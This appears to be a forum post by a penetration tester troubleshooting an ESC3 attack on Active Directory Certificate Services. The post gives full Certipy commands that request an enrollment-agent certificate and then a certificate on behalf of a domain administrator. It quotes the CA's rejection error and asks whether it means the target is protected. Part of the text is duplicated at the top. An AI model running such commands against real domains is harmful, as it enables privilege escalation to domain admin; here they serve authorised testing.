Got error while trying to request certificate: code: 0x80094806 - CERTSRV_E_BAD_RENEWAL_SUBJECT - The request was made on behalf of a subject other than the caller. The certificate template must be configured to require at least one signature to authorize the request.
From what I can glean on the Interwebs, this means the client has to manually approve this request? Thus, the client has protections in place against this attack?
Hi!
I used Certipy to identify a ESC3 vuln on a pentest. I did the
reqsong and dance:certipy req -u me@domain.com -p Winter2023 -ca CA-NAME -target F.Q.D.N -template VulnTemplateThat generated the
me.pfxfile.Next, I did this:
certipy req -u me@domain.com -p Winter2023 -ca CA-NAME -target F.Q.D.N -template VulnTemplate -on-behalf-of 'AD-NETBIOS-NAME\domainadmin' -pfx me.pfxWhen I did this I got:
Got error while trying to request certificate: code: 0x80094806 - CERTSRV_E_BAD_RENEWAL_SUBJECT - The request was made on behalf of a subject other than the caller. The certificate template must be configured to require at least one signature to authorize the request.From what I can glean on the Interwebs, this means the client has to manually approve this request? Thus, the client has protections in place against this attack?